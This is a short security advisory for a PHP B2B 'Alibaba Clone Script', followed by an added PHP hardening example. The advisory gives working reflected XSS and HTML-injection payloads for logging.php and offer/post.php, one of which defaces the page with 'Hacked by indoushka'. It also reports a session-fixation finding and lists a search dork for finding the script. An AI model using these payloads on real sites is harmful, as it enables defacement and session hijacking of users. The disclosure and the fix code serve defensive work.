
Alibaba Clone Script v3 Multi Vulnerability

Author: indoushka , Published: 25-10-2014
Vendor : www.p30vel.ir
Dork : A new PHP B2B Web
======================================

(XSS / HTML injection):

http://127.0.0.1//Alibaba/logging.php?forward=http://127.0.0.1/Alibaba/office-room/index.php%22%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E%22

Cross site scripting (verified) :

This vulnerability affects /Alibaba/logging.php

Attack details:
URL-encoded GET input forward was set to http://127.0.0.1/Alibaba/office-room/index.php" onmouseover=prompt(965929) bad="

This vulnerability affects /Alibaba/offer/post.php

Attack details:
POST (multipart) input data[tradefield][address] was set to 3137 Laguna Street" onmouseover=prompt(908278) bad="
The input is reflected inside a tag attribute value between double quotes.

Session fixation :
This vulnerability affects /Alibaba/logging.php.
Discovered by: Scripting (Session_Fixation.script).
Attack details
Session cookie PHPSESSID was fixed to dfgjldkmfnmnmklhgmffixation.
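
Added example (not code from the advisory or from the script itself): server-side handling in PHP that addresses the findings above, with attribute-context encoding for the reflected `forward` and `data[tradefield][address]` values and session ID regeneration at login. The function names, the relative-path rule for `forward` and the form markup are assumptions made for illustration.

```php
<?php
// Added example: hypothetical hardened handling, not the script's own code.

// Encode a value for output inside a double-quoted HTML attribute.
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Assumption: post-login targets are same-site relative paths only.
function safe_forward(string $forward, string $default = '/Alibaba/office-room/index.php'): string
{
    // Reject absolute and scheme-relative URLs, backslashes and control characters.
    if ($forward === '' || $forward[0] !== '/' || substr($forward, 0, 2) === '//'
        || preg_match('/[\\\\\x00-\x1f]/', $forward)) {
        return $default;
    }
    return $forward;
}

// Call once credentials have been verified (hypothetical hook).
function on_login_success(int $userId): void
{
    session_regenerate_id(true);   // issue a new ID and delete the pre-login session
    $_SESSION['uid'] = $userId;
}

ini_set('session.use_strict_mode', '1');   // refuse session IDs the server did not issue
ini_set('session.use_only_cookies', '1');  // never take the session ID from the URL
session_start();

// Request values may arrive as arrays; treat anything that is not a string as empty.
$rawForward = $_GET['forward'] ?? '';
$rawAddress = $_POST['data']['tradefield']['address'] ?? '';
$forward = safe_forward(is_string($rawForward) ? $rawForward : '');
$address = is_string($rawAddress) ? $rawAddress : '';
?>
<form method="post" action="logging.php">
  <input type="hidden" name="forward" value="<?= attr($forward) ?>">
  <input type="text" name="data[tradefield][address]" value="<?= attr($address) ?>">
</form>
```

With `ENT_QUOTES`, the `"` in the reported inputs is emitted as `&quot;`, so the value cannot close the attribute and introduce an `onmouseover` handler.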
